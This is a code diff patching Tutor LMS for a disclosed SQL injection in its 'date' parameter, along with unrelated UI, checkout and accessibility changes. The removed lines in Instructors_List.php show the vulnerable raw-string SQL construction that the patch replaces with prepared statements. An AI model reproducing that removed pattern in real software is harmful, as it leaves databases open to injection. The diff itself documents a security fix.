CVE-2026-6080: Tutor LMS <= 3.9.8 – Authenticated (Admin+) SQL Injection via 'date' Parameter (tutor)

--- a/tutor/classes/Admin.php
+++ b/tutor/classes/Admin.php
@@ -37,6 +37,7 @@
 	public function __construct() {

 		add_action( 'admin_notices', array( $this, 'show_unstable_version_admin_notice' ) );
+		add_action( 'admin_notices', array( $this, 'show_v4_beta_notice' ) );

 		add_action( 'admin_menu', array( $this, 'register_menu' ) );
 		// Force activate menu for necessary.
@@ -84,6 +85,61 @@
 			<?php
 		}
 	}
+
+	/**
+	 * Show version 4 admin notice.
+	 *
+	 * @since 3.9.9
+	 *
+	 * @return void
+	 */
+	public function show_v4_beta_notice() {
+		if ( version_compare( TUTOR_VERSION, '4', '<' ) ) {
+			?>
+			<div class="tutor-v4-beta-notice notice is-dismissible">
+				<div class="tutor-v4-beta-notice-left">
+					<img src="<?php echo esc_url( tutor()->url . 'assets/images/v4-notice-logo.svg' ); ?>" alt="Tutor LMS 4.0 Beta">
+				</div>
+			<div class="tutor-v4-beta-notice-right">
+				<div class="tutor-v4-beta-notice-right-content">
+					<h3><?php esc_html_e( 'Be the First to Try Tutor LMS 4.0 Beta!', 'tutor' ); ?></h3>
+					<p>
+						<?php
+						echo wp_kses(
+							sprintf(
+								/* translators: 1: opening anchor tag, 2: closing anchor tag */
+								__(
+									'Explore the upcoming features of Tutor LMS 4.0, test the experience, and help us improve with your valuable %1$sfeedback%2$s.',
+									'tutor'
+								),
+								'<a href="https://forms.gle/Dxc1CWT63UcEAJGR9" target="_blank" rel="noopener noreferrer">',
+								' <i class="tutor-icon-external-link" aria-hidden="true"></i></a>'
+							),
+							array(
+								'a' => array(
+									'href'   => true,
+									'target' => true,
+									'rel'    => true,
+								),
+								'i' => array(
+									'class'       => true,
+									'aria-hidden' => true,
+								),
+							)
+						);
+						?>
+					</p>
+				</div>
+				<div class="tutor-v4-beta-notice-right-buttons">
+					<a href="https://tutorlms.com/blog/first-look-into-tutor-lms-4-0/?nocache=1" target="_blank" rel="noopener noreferrer" class="tutor-btn tutor-btn-tertiary tutor-gap-4px tutor-text-nowrap">
+						<?php esc_html_e( 'Try now', 'tutor' ); ?>
+					</a>
+				</div>
+			</div>
+		</div>
+			<?php
+		}
+	}

 	/**
 	 * Register admin menus
--- a/tutor/classes/Course.php
+++ b/tutor/classes/Course.php
@@ -1695,6 +1695,8 @@
 	 * Update course content order
 	 *
 	 * @since 1.0.0
+	 * @since 3.9.9 Check if user can manage course before updating order.
+	 *
 	 * @return void
 	 */
 	public function ajax_update_course_content_order() {
@@ -1707,11 +1709,15 @@
 			wp_send_json_error( __( 'Sorting order is required', 'tutor' ) );
 		}

-		foreach ( $sorting_order as $topic ) {
-			if ( isset( $topic['topic_id'] ) && ! tutor_utils()->can_user_manage( 'topic', $topic['topic_id'] ) ) {
-				wp_send_json_error( __( 'Access Denied!', 'tutor' ) );
-				return;
-			}
+		$topic_id  = (int) isset( $sorting_order[0], $sorting_order[0]['topic_id'] ) ? $sorting_order[0]['topic_id'] : 0;
+		$course_id = wp_get_post_parent_id( $topic_id );
+
+		if ( ! $topic_id || ! $course_id ) {
+			wp_send_json_error( tutor_utils()->error_message( 'invalid_req' ) );
+		}
+
+		if ( ! tutor_utils()->can_user_manage( 'course', $course_id ) || ! User::is_admin() ) {
+			wp_send_json_error( tutor_utils()->error_message() );
 		}

 		if ( Input::has( 'content_parent' ) ) {
@@ -1719,11 +1725,6 @@
 			$topic_id       = tutor_utils()->array_get( 'parent_topic_id', $content_parent );
 			$content_id     = tutor_utils()->array_get( 'content_id', $content_parent );

-			if ( ! tutor_utils()->can_user_manage( 'topic', $topic_id ) ) {
-				wp_send_json_success( array( 'message' => __( 'Access Denied!', 'tutor' ) ) );
-				exit;
-			}
-
 			// Update the parent topic id of the content.
 			global $wpdb;
 			$wpdb->update( $wpdb->posts, array( 'post_parent' => $topic_id ), array( 'ID' => $content_id ) );
--- a/tutor/classes/Instructor.php
+++ b/tutor/classes/Instructor.php
@@ -95,9 +95,15 @@
 				'user_login'            => __( 'User Name field is required', 'tutor' ),
 				'password'              => __( 'Password field is required', 'tutor' ),
 				'password_confirmation' => __( 'Password Confirmation field is required', 'tutor' ),
+
 			)
 		);

+		$terms_conditions_link = tutor_utils()->get_toc_page_link();
+		if ( $terms_conditions_link ) {
+			$required_fields['terms_conditions'] = __( 'Please accept the Terms and Conditions to continue', 'tutor' );
+		}
+
 		$validation_errors = array();

 		/*
--- a/tutor/classes/Instructors_List.php
+++ b/tutor/classes/Instructors_List.php
@@ -373,8 +373,8 @@
 			}
 		}

-		$date_clause   = '' !== $date ? "AND DATE(user.user_registered) = CAST('$date' AS DATE )" : '';
-		$in_clause     = QueryHelper::prepare_in_clause( $status );
+		$date_clause = '' !== $date ? $wpdb->prepare( 'AND DATE(user.user_registered) = %s', $date ) : '';
+		$in_clause   = QueryHelper::prepare_in_clause( $status );

 		$query  = "SELECT
 					DISTINCT user.*,
@@ -446,10 +446,11 @@
 		$course_clause = '';
 		if ( '' !== $course_id ) {
 			$course_id     = (int) $course_id;
-			$course_clause =  "AND umeta.meta_value = {$course_id}";
+			$course_clause = "AND umeta.meta_value = {$course_id}";
 		}
-		$date_clause   = '' !== $date ? "AND DATE(user.user_registered) = CAST('$date' AS DATE )" : '';
-		$in_clause     = QueryHelper::prepare_in_clause( $status );
+
+		$date_clause = '' !== $date ? $wpdb->prepare( 'AND DATE(user.user_registered) = %s', $date ) : '';
+		$in_clause   = QueryHelper::prepare_in_clause( $status );

 		$query  = "SELECT
 					COUNT(DISTINCT user.ID)
--- a/tutor/classes/Student.php
+++ b/tutor/classes/Student.php
@@ -71,6 +71,11 @@
 			)
 		);

+		$terms_conditions_link = tutor_utils()->get_toc_page_link();
+		if ( $terms_conditions_link ) {
+			$required_fields['terms_conditions'] = __( 'Please accept the Terms and Conditions to continue', 'tutor' );
+		}
+
 		$validation_errors = array();

 		// Registration error push into validation_errors.
@@ -86,6 +91,7 @@
 			}
 		}

+
 		if ( ! filter_var( tutor_utils()->input_old( 'email' ), FILTER_VALIDATE_EMAIL ) ) {
 			$validation_errors['email'] = __( 'Valid E-Mail is required', 'tutor' );
 		}
--- a/tutor/ecommerce/CheckoutController.php
+++ b/tutor/ecommerce/CheckoutController.php
@@ -19,6 +19,7 @@
 use TutorModelsBillingModel;
 use TutorTraitsJsonResponse;
 use TutorHelpersValidationHelper;
+use TutorProEcommerceGuestCheckoutGuestCheckout;

 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
@@ -560,12 +561,26 @@
 			set_transient( self::PAY_NOW_ALERT_MSG_TRANSIENT_KEY . 'pay_now_nonce_alert', $errors );
 			return;
 		}
+
 		global $wpdb;
 		$order_data      = null;
 		$billing_model   = new BillingModel();
-		$current_user_id = is_user_logged_in() ? get_current_user_id() : wp_rand();
+		$current_user_id = get_current_user_id();
+
+		$is_guest_checkout_endabled = class_exists( 'TutorProEcommerceGuestCheckoutGuestCheckout' ) && GuestCheckout::is_enable();
+
+		// Pevent invalid request.
+		if ( ! $current_user_id ) {
+			if ( $is_guest_checkout_endabled ) {
+				// Guest user.
+				$current_user_id = wp_rand(); // A random id to iniquely indentify.
+			} else {
+				wp_die( esc_html( tutor_utils()->error_message( 'invalid_req' ) ) );
+			}
+		}
+
 		$request = Input::sanitize_array( $_POST ); //phpcs:ignore --sanitized.
-		$order_id        = Input::get( 'order_id', 0, Input::TYPE_INT );
+		$order_id = Input::get( 'order_id', 0, Input::TYPE_INT );

 		if ( $order_id ) {
 			$order_data = OrderModel::get_valid_incomplete_order( $order_id, get_current_user_id(), true );
@@ -621,6 +636,30 @@

 		if ( empty( $object_ids ) ) {
 			array_push( $errors, __( 'Invalid cart items', 'tutor' ) );
+		} elseif ( OrderModel::TYPE_SINGLE_ORDER === $order_type ) {
+			foreach ( $object_ids as $object_id ) {
+				if ( ! in_array( get_post_type( $object_id ), array( tutor()->course_post_type, tutor()->bundle_post_type ), true ) ) {
+					// translators: %s is the course title.
+					array_push( $errors, sprintf( __( 'Invalid item: %s', 'tutor' ), get_the_title( $object_id ) ) );
+				}
+			}
+		} elseif ( OrderModel::TYPE_SUBSCRIPTION === $order_type ) {
+			$item_id = $object_ids[0] ?? 0;
+			if ( $item_id ) {
+				$plan = apply_filters( 'tutor_get_plan_info', null, $item_id );
+				if ( ! $plan ) {
+					array_push( $errors, __( 'Invalid plan', 'tutor' ) );
+				}
+			} else {
+				array_push( $errors, __( 'Invalid plan', 'tutor' ) );
+			}
+		} else {
+			array_push( $errors, __( 'Invalid order type', 'tutor' ) );
+		}
+
+		if ( ! empty( $errors ) ) {
+			set_transient( self::PAY_NOW_ERROR_TRANSIENT_KEY . $current_user_id, $errors );
+			return;
 		}

 		$billing_info = $billing_model->get_info( $current_user_id );
--- a/tutor/ecommerce/HooksHandler.php
+++ b/tutor/ecommerce/HooksHandler.php
@@ -195,7 +195,7 @@
 		 *
 		 * @since 3.9.7
 		 */
-		$is_valid_paid_order = OrderModel::ORDER_COMPLETED === $order_details && OrderModel::PAYMENT_PAID === $order_details->payment_status;
+		$is_valid_paid_order = OrderModel::ORDER_COMPLETED === $order_details->order_status && OrderModel::PAYMENT_PAID === $order_details->payment_status;

 		if ( $order_details && ! $is_valid_paid_order ) {
 			$prev_payment_status = $order_details->payment_status;
@@ -219,6 +219,9 @@
 				case $this->order_model::PAYMENT_REFUNDED:
 					$order_data['order_status'] = $this->order_model::ORDER_CANCELLED;
 					break;
+				case $this->order_model::PAYMENT_PENDING:
+					$order_data['order_status'] = $this->order_model::ORDER_PENDING;
+					break;
 			}

 			$update = $this->order_model->update_order( $order_id, $order_data );
--- a/tutor/includes/tutor-general-functions.php
+++ b/tutor/includes/tutor-general-functions.php
@@ -1113,7 +1113,7 @@
 			<span>
 				<?php echo is_array( $allowed_tags ) && count( $allowed_tags ) ? wp_kses( $message, $allowed_tags ) : esc_html( $message ); ?>
 			</span>
-			<span class="tutor-icon-times" area-hidden="true" onclick="this.closest('div').remove()" style="cursor: pointer;"></span>
+			<span class="tutor-icon-times" aria-hidden="true" onclick="this.closest('div').remove()" style="cursor: pointer;"></span>
 		</div>
 		<?php
 	}
@@ -1174,7 +1174,7 @@
 							<?php echo esc_html( isset( $button['title'] ) ? $button['title'] : '' ); ?>
 						</a>
 					<?php endforeach; ?>
-					<span class="tutor-icon-times" area-hidden="true" onclick="this.closest('#tutor-reuseable-snackbar').remove()" style="cursor: pointer;"></span>
+					<span class="tutor-icon-times" aria-hidden="true" onclick="this.closest('#tutor-reuseable-snackbar').remove()" style="cursor: pointer;"></span>
 				</div>
 			</div>
 		</div>
--- a/tutor/models/OrderModel.php
+++ b/tutor/models/OrderModel.php
@@ -38,6 +38,7 @@
 	const ORDER_COMPLETED  = 'completed';
 	const ORDER_CANCELLED  = 'cancelled';
 	const ORDER_TRASH      = 'trash';
+	const ORDER_PENDING    = 'pending';

 	/**
 	 * Payment status
@@ -51,6 +52,7 @@
 	const PAYMENT_UNPAID             = 'unpaid';
 	const PAYMENT_REFUNDED           = 'refunded';
 	const PAYMENT_PARTIALLY_REFUNDED = 'partially-refunded';
+	const PAYMENT_PENDING            = 'pending';

 	/**
 	 * Payment methods
@@ -291,6 +293,7 @@
 			self::ORDER_COMPLETED  => __( 'Completed', 'tutor' ),
 			self::ORDER_CANCELLED  => __( 'Cancelled', 'tutor' ),
 			self::ORDER_TRASH      => __( 'Trash', 'tutor' ),
+			self::ORDER_PENDING    => __( 'Pending', 'tutor' ),
 		);
 	}

@@ -323,6 +326,7 @@
 			self::PAYMENT_FAILED             => __( 'Failed', 'tutor' ),
 			self::PAYMENT_REFUNDED           => __( 'Refunded', 'tutor' ),
 			self::PAYMENT_PARTIALLY_REFUNDED => __( 'Partially Refunded', 'tutor' ),
+			self::PAYMENT_PENDING            => __( 'Pending', 'tutor' ),
 		);
 	}

--- a/tutor/restapi/RestAuth.php
+++ b/tutor/restapi/RestAuth.php
@@ -375,15 +375,15 @@
 			<td>
 				<div class="tutor-dropdown-parent">
 					<button type="button" class="tutor-iconic-btn" action-tutor-dropdown="toggle">
-						<span class="tutor-icon-kebab-menu" area-hidden="true"></span>
+						<span class="tutor-icon-kebab-menu" aria-hidden="true"></span>
 					</button>
 					<div class="tutor-dropdown tutor-dropdown-dark tutor-text-left">
 						<a href="javascript:void(0)" class="tutor-dropdown-item" data-tutor-modal-target="tutor-update-permission-modal" data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>">
-							<i class="tutor-icon-edit tutor-mr-8" area-hidden="true" data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>"></i>
+							<i class="tutor-icon-edit tutor-mr-8" aria-hidden="true" data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>"></i>
 							<span data-update-id="<?php echo esc_attr( $meta_id ); ?>" data-permission="<?php echo esc_attr( $permission ); ?>" data-description="<?php echo esc_attr( $description ); ?>"><?php esc_html_e( 'Edit', 'tutor' ); ?></span>
 						</a>
 						<a href="javascript:void(0)" class="tutor-dropdown-item" data-meta-id="<?php echo esc_attr( $meta_id ); ?>">
-							<i class="tutor-icon-trash-can-bold tutor-mr-8" area-hidden="true" data-meta-id="<?php echo esc_attr( $meta_id ); ?>"></i>
+							<i class="tutor-icon-trash-can-bold tutor-mr-8" aria-hidden="true" data-meta-id="<?php echo esc_attr( $meta_id ); ?>"></i>
 							<span data-meta-id="<?php echo esc_attr( $meta_id ); ?>"><?php esc_html_e( 'Revoke', 'tutor' ); ?></span>
 						</a>
 					</div>
--- a/tutor/templates/course-embed.php
+++ b/tutor/templates/course-embed.php
@@ -60,14 +60,14 @@
 			<div class="tutor-meta tutor-mt-12 tutor-mb-20">
 				<?php if ( tutor_utils()->get_option( 'enable_course_total_enrolled' ) ) : ?>
 					<div>
-						<span class="tutor-meta-icon tutor-icon-user-line" area-hidden="true"></span>
+						<span class="tutor-meta-icon tutor-icon-user-line" aria-hidden="true"></span>
 						<span class="tutor-meta-value"><?php echo esc_html( $course_students ); ?></span>
 					</div>
 				<?php endif; ?>

 				<?php if ( ! empty( $course_duration ) ) : ?>
 					<div>
-						<span class="tutor-icon-clock-line tutor-meta-icon" area-hidden="true"></span>
+						<span class="tutor-icon-clock-line tutor-meta-icon" aria-hidden="true"></span>
 						<span class="tutor-meta-value">
 							<?php
 								//phpcs:ignore --data sanitize through helper method
--- a/tutor/templates/course-filter/filters.php
+++ b/tutor/templates/course-filter/filters.php
@@ -26,7 +26,7 @@

 <form class="tutor-course-filter-form tutor-form">
 	<div class="tutor-mb-16 tutor-d-block tutor-d-xl-none tutor-text-right">
-		<a href="#" class="tutor-iconic-btn tutor-mr-n8" tutor-hide-course-filter><span class="tutor-icon-times" area-hidden="true"></span></a>
+		<a href="#" class="tutor-iconic-btn tutor-mr-n8" tutor-hide-course-filter><span class="tutor-icon-times" aria-hidden="true"></span></a>
 	</div>

 	<?php do_action( 'tutor_course_filter/before' ); ?>
@@ -34,7 +34,7 @@
 	<?php if ( in_array( 'search', $supported_filters ) ) : ?>
 		<div class="tutor-widget tutor-widget-search">
 			<div class="tutor-form-wrap">
-				<span class="tutor-icon-search tutor-form-icon" area-hidden="true"></span>
+				<span class="tutor-icon-search tutor-form-icon" aria-hidden="true"></span>
 				<input type="Search" class="tutor-form-control" name="keyword" placeholder="<?php esc_attr_e( 'Search', 'tutor' ); ?>"/>
 			</div>
 		</div>
--- a/tutor/templates/dashboard/announcements.php
+++ b/tutor/templates/dashboard/announcements.php
@@ -64,7 +64,7 @@
 	<div class="tutor-row tutor-align-lg-center">
 		<div class="tutor-col-lg-auto tutor-mb-16 tutor-mb-lg-0">
 			<div class="tutor-round-box tutor-p-8">
-				<i class="tutor-icon-bullhorn tutor-fs-3" area-hidden="true"></i>
+				<i class="tutor-icon-bullhorn tutor-fs-3" aria-hidden="true"></i>
 			</div>
 		</div>

--- a/tutor/templates/dashboard/assignments/review.php
+++ b/tutor/templates/dashboard/assignments/review.php
@@ -44,7 +44,7 @@

 	<div class="submitted-assignment-title tutor-mb-16">
 		<a class="tutor-btn tutor-btn-ghost" href="<?php echo esc_url( $submitted_url . '?assignment=' . $assignment_id ); ?>">
-			<span class="tutor-icon-previous tutor-mr-8" area-hidden="true"></span>
+			<span class="tutor-icon-previous tutor-mr-8" aria-hidden="true"></span>
 			<?php esc_html_e( 'Back', 'tutor' ); ?>
 		</a>
 	</div>
--- a/tutor/templates/dashboard/assignments/submitted.php
+++ b/tutor/templates/dashboard/assignments/submitted.php
@@ -40,7 +40,7 @@
 <div class="tutor-dashboard-content-inner tutor-dashboard-assignment-submits">
 	<div class="tutor-mb-24">
 		<a class="tutor-btn tutor-btn-ghost" href="<?php echo esc_url( tutor_utils()->get_tutor_dashboard_page_permalink( 'assignments' ) ); ?>">
-			<span class="tutor-icon-previous tutor-mr-8" area-hidden="true"></span>
+			<span class="tutor-icon-previous tutor-mr-8" aria-hidden="true"></span>
 			<?php esc_html_e( 'Back', 'tutor' ); ?>
 		</a>
 	</div>
--- a/tutor/templates/dashboard/dashboard.php
+++ b/tutor/templates/dashboard/dashboard.php
@@ -41,7 +41,7 @@
 								<div class="tutor-row tutor-gx-1">
 									<?php for ( $i = 1; $i <= $total_count; $i++ ) : ?>
 										<div class="tutor-col">
-											<div class="tutor-progress-bar" style="--tutor-progress-value: <?php echo $i > $complete_count ? 0 : 100; ?>%; height: 8px;"><div class="tutor-progress-value" area-hidden="true"></div></div>
+											<div class="tutor-progress-bar" style="--tutor-progress-value: <?php echo $i > $complete_count ? 0 : 100; ?>%; height: 8px;"><div class="tutor-progress-value" aria-hidden="true"></div></div>
 										</div>
 									<?php endfor; ?>
 								</div>
@@ -49,7 +49,7 @@

 							<div class="tutor-col-auto">
 								<span class="tutor-round-box tutor-my-n20">
-									<i class="tutor-icon-trophy" area-hidden="true"></i>
+									<i class="tutor-icon-trophy" aria-hidden="true"></i>
 								</span>
 							</div>
 						</div>
@@ -160,7 +160,7 @@
 			<div class="tutor-card">
 				<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 					<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-						<i class="tutor-icon-book-open" area-hidden="true"></i>
+						<i class="tutor-icon-book-open" aria-hidden="true"></i>
 					</span>
 					<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $enrolled_course_count ); ?></div>
 					<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Enrolled Courses', 'tutor' ); ?></div>
@@ -173,7 +173,7 @@
 			<div class="tutor-card">
 				<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 					<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-						<i class="tutor-icon-mortarboard-o" area-hidden="true"></i>
+						<i class="tutor-icon-mortarboard-o" aria-hidden="true"></i>
 					</span>
 					<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $active_course_count ); ?></div>
 					<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Active Courses', 'tutor' ); ?></div>
@@ -186,7 +186,7 @@
 			<div class="tutor-card">
 				<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 					<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-						<i class="tutor-icon-trophy" area-hidden="true"></i>
+						<i class="tutor-icon-trophy" aria-hidden="true"></i>
 					</span>
 					<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $completed_course_count ); ?></div>
 					<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Completed Courses', 'tutor' ); ?></div>
@@ -202,7 +202,7 @@
 				<div class="tutor-card">
 					<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 						<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-							<i class="tutor-icon-user-graduate" area-hidden="true"></i>
+							<i class="tutor-icon-user-graduate" aria-hidden="true"></i>
 						</span>
 						<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( $total_students ); ?></div>
 						<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Total Students', 'tutor' ); ?></div>
@@ -215,7 +215,7 @@
 				<div class="tutor-card">
 					<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 						<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-							<i class="tutor-icon-box-open" area-hidden="true"></i>
+							<i class="tutor-icon-box-open" aria-hidden="true"></i>
 						</span>
 						<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo esc_html( count( $my_courses ) ); ?></div>
 						<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Total Courses', 'tutor' ); ?></div>
@@ -228,7 +228,7 @@
 				<div class="tutor-card">
 					<div class="tutor-d-flex tutor-flex-lg-column tutor-align-center tutor-text-lg-center tutor-px-12 tutor-px-lg-24 tutor-py-8 tutor-py-lg-32">
 						<span class="tutor-round-box tutor-mr-12 tutor-mr-lg-0 tutor-mb-lg-12">
-							<i class="tutor-icon-coins" area-hidden="true"></i>
+							<i class="tutor-icon-coins" aria-hidden="true"></i>
 						</span>
 						<div class="tutor-fs-3 tutor-fw-bold tutor-d-none tutor-d-lg-block"><?php echo wp_kses_post( tutor_utils()->tutor_price( $earning_sum->total_income ) ); ?></div>
 						<div class="tutor-fs-7 tutor-color-secondary"><?php esc_html_e( 'Total Earnings', 'tutor' ); ?></div>
@@ -302,7 +302,7 @@

 							<div class="tutor-row tutor-align-center">
 								<div class="tutor-col">
-									<div class="tutor-progress-bar tutor-mr-16" style="--tutor-progress-value:<?php echo esc_attr( $course_progress['completed_percent'] ); ?>%"><span class="tutor-progress-value" area-hidden="true"></span></div>
+									<div class="tutor-progress-bar tutor-mr-16" style="--tutor-progress-value:<?php echo esc_attr( $course_progress['completed_percent'] ); ?>%"><span class="tutor-progress-value" aria-hidden="true"></span></div>
 								</div>

 								<div class="tutor-col-auto">
--- a/tutor/templates/dashboard/instructor/registration.php
+++ b/tutor/templates/dashboard/instructor/registration.php
@@ -156,9 +156,18 @@
 			?>

 			<?php if ( null !== $tutor_toc_page_link ) : ?>
-				<div class="tutor-mb-24">
-					<?php esc_html_e( 'By signing up, I agree with the website's', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_attr_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
-				</div>
+				<div class="tutor-form-row tutor-mb-24">
+					<div class="tutor-form-col-12">
+						<div class="tutor-d-flex tutor-gap-1 tutor-align-center">
+							<div class="tutor-form-wrap">
+								<input type="checkbox" id="tutor-terms-conditions" name="terms_conditions" required>
+							</div>
+							<label for="tutor-terms-conditions">
+								<?php esc_html_e( 'By signing up, you agree to the', 'tutor' ); ?> <a target="_blank" href="<?php echo esc_url( $tutor_toc_page_link ); ?>" title="<?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?>"><?php esc_html_e( 'Terms and Conditions', 'tutor' ); ?></a>
+							</label>
+						</div>
+					</div>
+				</div>
 			<?php endif; ?>

 			<div>
--- a/tutor/templates/dashboard/my-courses.php
+++ b/tutor/templates/dashboard/my-courses.php
@@ -141,7 +141,7 @@
 							<div class="tutor-meta tutor-mt-16">
 								<?php if ( ! empty( $course_duration ) ) : ?>
 									<div>
-										<span class="tutor-icon-clock-line tutor-meta-icon" area-hidden="true"></span>
+										<span class="tutor-icon-clock-line tutor-meta-icon" aria-hidden="true"></span>
 										<span class="tutor-meta-value">
 										<?php
 										echo wp_kses(
@@ -157,7 +157,7 @@

 								<?php if ( ! empty( $course_students ) ) : ?>
 									<div>
-										<span class="tutor-icon-user-line tutor-meta-icon" area-hidden="true"></span>
+										<span class="tutor-icon-user-line tutor-meta-icon" aria-hidden="true"></span>
 										<span class="tutor-meta-value">
 										<?php
 										echo wp_kses(
@@ -196,11 +196,11 @@
 								</div>
 								<div class="tutor-iconic-btn-group tutor-mr-n8">
 									<a href="<?php echo esc_url( $course_edit_link ); ?>" class="tutor-iconic-btn tutor-my-course-edit">
-										<i class="tutor-icon-edit" area-hidden="true"></i>
+										<i class="tutor-icon-edit" aria-hidden="true"></i>
 									</a>
 									<div class="tutor-dropdown-parent">
 										<button type="button" class="tutor-iconic-btn" action-tutor-dropdown="toggle">
-											<span class="tutor-icon-kebab-menu" area-hidden="true"></span>
+											<span class="tutor-icon-kebab-menu" aria-hidden="true"></span>
 										</button>
 										<div id="table-dashboard-course-list-<?php echo esc_attr( $post->ID ); ?>" class="tutor-dropdown tutor-dropdown-dark tutor-text-left">

@@ -217,7 +217,7 @@
 												);
 												?>
 											<a class="tutor-dropdown-item" href="?<?php echo esc_attr( $params ); ?>">
-												<i class="tutor-icon-share tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-share tutor-mr-8" aria-hidden="true"></i>
 												<span>
 													<?php
 													$can_publish_course = current_user_can( 'administrator' ) || (bool) tutor_utils()->get_option( 'instructor_can_publish_course' );
@@ -243,7 +243,7 @@
 												);
 												?>
 											<a class="tutor-dropdown-item" href="?<?php echo esc_attr( $params ); ?>">
-												<i class="tutor-icon-copy-text tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-copy-text tutor-mr-8" aria-hidden="true"></i>
 												<span><?php esc_html_e( 'Duplicate', 'tutor' ); ?></span>
 											</a>
 											<?php endif; ?>
@@ -262,7 +262,7 @@
 												);
 												?>
 											<a class="tutor-dropdown-item" href="?<?php echo esc_attr( $params ); ?>">
-												<i class="tutor-icon-archive tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-archive tutor-mr-8" aria-hidden="true"></i>
 												<span><?php esc_html_e( 'Move to Draft', 'tutor' ); ?></span>
 											</a>
 											<?php endif; ?>
@@ -281,7 +281,7 @@
 												);
 												?>
 											<a href="?<?php echo esc_attr( $params ); ?>" class="tutor-dropdown-item">
-												<i class="tutor-icon-times tutor-mr-8" area-hidden="true"></i>
+												<i class="tutor-icon-times tutor-mr-8" aria-hidden="true"></i>
 												<span><?php esc_html_e( 'Cancel Submission', 'tutor' ); ?></span>
 											</a>
 											<?php endif; ?>
@@ -291,7 +291,7 @@
 											<?php if ( $is_main_instructor && in_array( $post->post_status, array( CourseModel::STATUS_PUBLISH, CourseModel::STATUS_DRAFT, CourseModel::STATUS_FUTURE ) ) ) : ?>
 												<?php if ( $show_course_delete ) : ?>
 												<a href="#" data-tutor-modal-target="<?php echo esc_attr( $id_string_delete ); ?>" class="tutor-dropdown-item tutor-admin-course-delete">
-													<i class="tutor-icon-trash-can-bold tutor-mr-8" area-hidden="true"></i>
+													<i class="tutor-icon-trash-can-bold tutor-mr-8" aria-hidden="true"></i>
 													<span><?php esc_html_e( 'Delete', 'tutor' ); ?></span>
 												</a>
 												<?php endif; ?>
@@ -305,20 +305,20 @@
 						</div>

 						<!-- Delete prompt modal -->
-						<div id="<?php echo esc_attr( $id_string_delete ); ?>" class="tutor-modal">
+						<div id="<?php echo esc_attr( $id_string_delete ); ?>" class="tutor-modal" role="dialog" aria-modal="true" aria-labelledby="<?php echo esc_attr( $id_string_delete ); ?>-title" aria-hidden="true">
 							<div class="tutor-modal-overlay"></div>
 							<div class="tutor-modal-window">
 								<div class="tutor-modal-content tutor-modal-content-white">
-									<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close>
-										<span class="tutor-icon-times" area-hidden="true"></span>
+									<button class="tutor-iconic-btn tutor-modal-close-o" data-tutor-modal-close aria-label="<?php esc_attr_e( 'Close', 'tutor' ); ?>">
+										<span class="tutor-icon-times" aria-hidden="true"></span>
 									</button>

 									<div class="tutor-modal-body tutor-text-center">
 										<div class="tutor-mt-48">
-											<img class="tutor-d-inline-block" src="<?php echo esc_attr( tutor()->url ); ?>assets/images/icon-trash.svg" />
+											<img class="tutor-d-inline-block" src="<?php echo esc_attr( tutor()->url ); ?>assets/images/icon-trash.svg" alt="<?php esc_attr_e( 'Delete This Course?', 'tutor' ); ?>" aria-hidden="true" />
 										</div>

-										<div class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php esc_html_e( 'Delete This Course?', 'tutor' ); ?></div>
+										<div id="<?php echo esc_attr( $id_string_delete ); ?>-title" class="tutor-fs-3 tutor-fw-medium tutor-color-black tutor-mb-12"><?php esc_html_e( 'Delete This Course?', 'tutor' ); ?></div>
 										<div class="tutor-fs-6 tutor-color-muted"><?php esc_html_e( 'Are you sure you want to delete this course permanently from the site? Please confirm your choice.', 'tutor' ); ?></div>

 										<div class="tutor-d-flex tutor-justify-center tutor-my-48">
--- a/tutor/templates/dashboard/purchase_history.php
+++ b/tutor/templates/dashboard/purchase_history.php
@@ -286,7 +286,7 @@
